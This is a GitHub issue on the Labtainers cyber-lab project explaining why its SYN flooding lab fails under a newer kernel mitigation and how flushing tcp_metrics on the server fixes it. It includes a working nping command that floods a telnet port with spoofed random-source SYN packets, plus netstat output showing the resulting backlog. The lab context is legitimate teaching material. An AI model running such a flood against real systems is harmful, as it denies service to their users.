search

mfthomps / Labtainers

Labtainers: A Docker-based cyber lab framework
https://nps.edu/web/c3o/labtainers
271 stars 68 forks source link

SYN Flooding Attack need `server:~$ sudo ip tcp_metrics flush` before starting #86

Open FrancoisCapon opened 1 year ago

FrancoisCapon commented 1 year ago

Hello,

I'm working on a lab based on Labtainers and I was a little frustrated because the SYN flood doesn't work: #29

The the explanation and the solution is in SEED Labs – TCP/IP Attack Lab [page 6 Note A: A kernel mitigation mechanism], indeed:

However, if before the attack, machine X has already made a telnet (or TCP connection) to the victim machine, then X seems to be “immune” to the SYN flooding attack, and can successfully telnet to the victim machine during the attack. It seems that the victim machine remembers past successful connections, and uses this memory when establishing future connections with the “returning” client.

This behavior does not exist in Ubuntu 16.04 and earlier versions.

In fact the kernel of the VM has certainly been updated and must implement this mitigation:

server:~$ sudo apt install iproute2 #ip not avaible
server:~$ ip tcp_metrics show
172.25.0.3 age 1031.056sec cwnd 10 rtt 4029us rttvar 7890us source 172.25.0.2 <= server IP
# former user connection is "conserved" :-(
server:~$ sudo ip tcp_metrics flush
server:~$ ip tcp_metrics show
server:~$

attacker:~ watch --interval 0.1 sudo nping --tcp --flags syn -p 23 -c 1 172.25.0.2 --source-ip rand

server:~$ watch --interval 2 --differences netstat -nat
Every 2.0s: netstat -nat                                                    Thu Oct 26

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.11:42225        0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 172.25.0.2:23           1.134.109.34:48166      SYN_RECV
tcp        0      0 172.25.0.2:23           210.33.194.177:54812    SYN_RECV
tcp        0      0 172.25.0.2:23           55.108.41.133:24773     SYN_RECV
tcp        0      0 172.25.0.2:23           132.95.209.224:59345    SYN_RECV
tcp        0      0 172.25.0.2:23           218.56.26.233:36566     SYN_RECV
tcp        0      0 172.25.0.2:23           187.181.2.54:27882      SYN_RECV
tcp        0      0 172.25.0.2:23           171.15.164.8:51374      SYN_RECV
tcp        0      0 172.25.0.2:23           18.91.155.119:24214     SYN_RECV
tcp        0      0 172.25.0.2:23           248.63.6.223:16868      SYN_RECV
tcp6       0      0 :::21                   :::*                    LISTEN

user:~$ telnet 172.25.0.2
Trying 172.25.0.2... # TCP SYN backlog full :-)
telnet: Unable to connect to remote host: Connection timed out

SYN Flooding Attack Successful :trophy: